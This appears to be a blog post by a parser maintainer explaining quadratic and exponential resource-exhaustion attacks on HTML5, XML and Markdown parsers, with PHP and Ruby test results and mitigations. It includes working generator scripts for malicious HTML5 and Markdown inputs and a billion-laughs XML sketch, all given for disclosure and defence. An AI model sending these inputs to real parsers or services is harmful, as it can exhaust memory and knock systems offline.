Parsing HTML5 is more dangerous than you think
When parsing files in any kind of format, most people assume that a parser behaves linearly in the size of the file being read. In other words, if parsing a 1 MB file takes 10 milliseconds, you'd expect a 1 GB file to be parsed in roughly 10 seconds. Unfortunately, this assumption is sometimes wrong. A well-known example is the “billion laughs” attack against XML. It involves XML entities, which are essentially macros. Expanding macros can trivially lead to super-linear behavior, in the case of billion laughs even to exponential behavior.
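As a reminder, the attack nests entity definitions, each level expanding to ten copies of the previous one. A sketch of its classic shape:

```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
```

Nine such levels fit in about a kilobyte of XML but expand to a billion copies of the string "lol", hence the name.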
In this article, I want to point out that HTML5 has similar problems. HTML5 is a complex specification, mostly because it tries to handle broken HTML in a sensible way. A typical example is misnested tags:
<b>one <i>two</b> three</i>
Here we encounter a start tag <i> followed by an end tag </b>
that doesn't match. If you parse this snippet, an HTML5 parser will
transform it into a parse tree matching
<b>one <i>two</i></b><i> three</i>
This behavior makes total sense and can be verified by evaluating the following JavaScript expression in your browser:
new DOMParser().parseFromString(
  '<b>one <i>two</b> three</i>',
  'text/html'
).documentElement.outerHTML
To handle the misnested </b> end tag, the HTML5 spec essentially
mandates closing the <i> tag as well and reconstructing the active
formatting elements
afterwards. This can be abused to cause quadratic behavior in every
conforming HTML5 parser. Consider the following HTML:
<b class="x"><b class="y"><b class="z">
<i class="x"><i class="y"><i class="z">
x</b>x</b>x</b>
After each misnested </b> end tag, the parser has to close and
reopen all the <i> tags. So if you repeat the <b> and <i> tags
N times, you end up with N² tags overall. Here's a simple Python
script that generates such malicious HTML:
import sys
n = int(sys.argv[1])
for i in range(n):
    print(f'<b {i}>', end='')
for i in range(n):
    print(f'<i {i}>', end='')
for i in range(n):
    print('x</b>', end='')
The start tags must differ in their attributes, otherwise the somewhat weird Noah's Ark clause makes the parser ignore open formatting elements. Running the script above with sizes 1,000, 10,000 and 100,000 results in file sizes of roughly 20, 200 and 2,000 KB. Opening the first file should, in theory, result in 1,000² or one million HTML elements being created. The second file creates 100 million and the third one 10 billion elements. Larger inputs will result in trillions of elements, assuming a machine with unlimited resources.
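To see where the quadratic count comes from without opening a browser, here's a deliberately simplified Python model of the reconstruction step (the real adoption agency algorithm is considerably more involved; this only tallies the elements that get created):

```python
def simulate_element_count(n):
    """Roughly model parsing the generated HTML: n nested <b> tags,
    n nested <i> tags, then n misnested </b> end tags. Each </b>
    implicitly closes the open <i> elements, and the parser then
    reconstructs all n active <i> formatting elements."""
    elements = 2 * n        # the original <b> and <i> start tags
    for _ in range(n):      # one iteration per misnested </b>
        elements += n       # every active <i> is reopened as a new element
    return elements

print(simulate_element_count(1000))  # 1002000, i.e. quadratic in n
```

The loop body is where the damage happens: a constant-size chunk of input (`x</b>`) triggers work proportional to the number of active formatting elements.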
So what happens if you open such files in a web browser? It obviously depends, but on macOS Safari the largest file causes a CPU core to run at full capacity for minutes and increases memory usage by a couple of GB until, at a guess, the browser runs into an internal limit and stops further processing.
All of this might look like a security issue, but at least in the context of modern web browsers it isn't. After all, these marvelous pieces of engineering allow running untrusted JavaScript code, which makes it trivial to consume an excessive amount of resources by other means. Everything is sandboxed, and the browser can simply abort if too much memory or CPU is used.
But how do offline parsers handle such files? Let's try some popular “scripting” languages and the underlying C libraries. Historically, many of these languages offered modules that used libxml2 to parse HTML under the hood, but libxml2 doesn't support HTML5. Luckily, other options are available these days.
Let's start with PHP which, as of version 8.4, supports parsing HTML5 using the lexbor library. With the test cases above, you'll quickly exceed PHP's default memory limit, so let's disable that:
<?php
ini_set("memory_limit", "-1");
$doc = Dom\HTMLDocument::createFromFile(
    $argv[1],
    LIBXML_NOERROR
);
The first file with 1,000 tags already takes 0.3 seconds to parse:
$ time php parse.php html5-dos-1000.html
real 0m0.382s
user 0m0.279s
sys 0m0.102s
Since we're dealing with quadratic behavior, we'd expect the second file with 10x the number of tags to take at least 100x more time. But on my machine with 32 GB of RAM, it takes several minutes, consuming all available memory until the process is terminated by the Linux OOM killer:
$ time php parse.php html5-dos-10000.html
Killed php parse.php html5-dos-10000.html
real 9m58.125s
user 9m43.038s
sys 0m8.649s
Note that, as mentioned above, this is just a ~200KB file. In conclusion, it's trivial to exhaust all available memory when letting PHP parse untrusted HTML5.
Now let's have a look at the Nokogiri Ruby gem, which has supported HTML5 via the gumbo library for quite a while.
require 'nokogiri'
doc = Nokogiri::HTML5(File.open(ARGV[0]))
$ ruby parse.rb html5-dos-1000.html
/usr/lib/ruby/gems/3.4.0/gems/nokogiri-1.18.9/lib/nokogiri/html5/document.rb:153:in 'Nokogiri::Gumbo.parse': Document tree depth limit exceeded (ArgumentError)
That's a lot better. Limiting the depth of the document tree is a good way to avoid resource exhaustion caused by such issues and it's unlikely that users raise this limit manually. If we raise the maximum depth to one million, we get results similar to PHP:
require 'nokogiri'
doc = Nokogiri::HTML5(
  File.open(ARGV[0]),
  max_tree_depth: 1000000
)
$ time ruby parse.rb html5-dos-1000.html
real 0m0.995s
user 0m0.834s
sys 0m0.160s
$ time ruby parse.rb html5-dos-10000.html
Killed ruby parse.rb html5-dos-10000.html
real 1m42.733s
user 1m37.020s
sys 0m5.588s
As far as I'm aware, lexbor and gumbo are the only options if you're looking for a C library to parse HTML5 and I'd expect other language bindings to these libraries to behave similarly. Unfortunately, lexbor doesn't have an option to guard against malicious HTML5, but it seems to me that such protection would be useful.
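Until such options exist, callers can impose limits themselves, for example by parsing in a separate process with a hard cap on address space. A minimal sketch in Python on Unix-like systems (the command below is a stand-in for whatever parser you actually invoke, and the 512 MB limit is an arbitrary choice):

```python
import resource
import subprocess
import sys

LIMIT_BYTES = 512 * 1024 * 1024  # arbitrary 512 MB address-space cap

def limit_memory():
    # Runs in the child process before exec: allocations beyond the cap
    # fail cleanly instead of driving the machine into the OOM killer.
    resource.setrlimit(resource.RLIMIT_AS, (LIMIT_BYTES, LIMIT_BYTES))

# Stand-in command; replace with the actual parser invocation.
result = subprocess.run(
    [sys.executable, "-c", "print('parsed')"],
    preexec_fn=limit_memory,
    timeout=10,          # also bound the parse time
    capture_output=True,
)
print(result.stdout.decode().strip())
```

A crashed or killed child process is then an error the caller can handle, rather than a machine-wide resource exhaustion.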
Other file formats
I already mentioned the billion laughs attack against XML, but there's another part of the spec that makes XML parsing quadratic by design. While I mitigated the issue in libxml2, the popular Expat library is still vulnerable and I don't want to disclose the details until the defect is fixed.
Markdown also suffers from a quadratic-by-design issue when handling reference links. Consider the following Markdown input:
[link]
[link]
[link]
[link]
...
[link]: /an-extremely-long-link/an-extremely-long-link/...
You can simply make the link destination extremely long and cause the parser to insert it over and over again with a link label of just a few bytes. In essence, this is just another example of macro-like expansion. I mitigated the issue in libcmark, the reference CommonMark implementation, in 2020.
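A generator analogous to the HTML one above can be sketched as follows (the repeated path segment mirrors the example and is otherwise arbitrary):

```python
import sys

def gen_markdown_dos(n):
    """Return Markdown whose rendered output grows quadratically in n:
    n short [link] reference uses, each of which the renderer expands
    to the same very long destination URL."""
    uses = '[link]\n' * n
    definition = '[link]: /' + 'an-extremely-long-link/' * n + '\n'
    return uses + '\n' + definition

if __name__ == '__main__':
    sys.stdout.write(gen_markdown_dos(int(sys.argv[1])))
```

The input is linear in n (n short uses plus one long definition), but a naive renderer copies the n-segment destination into all n links, producing quadratic output.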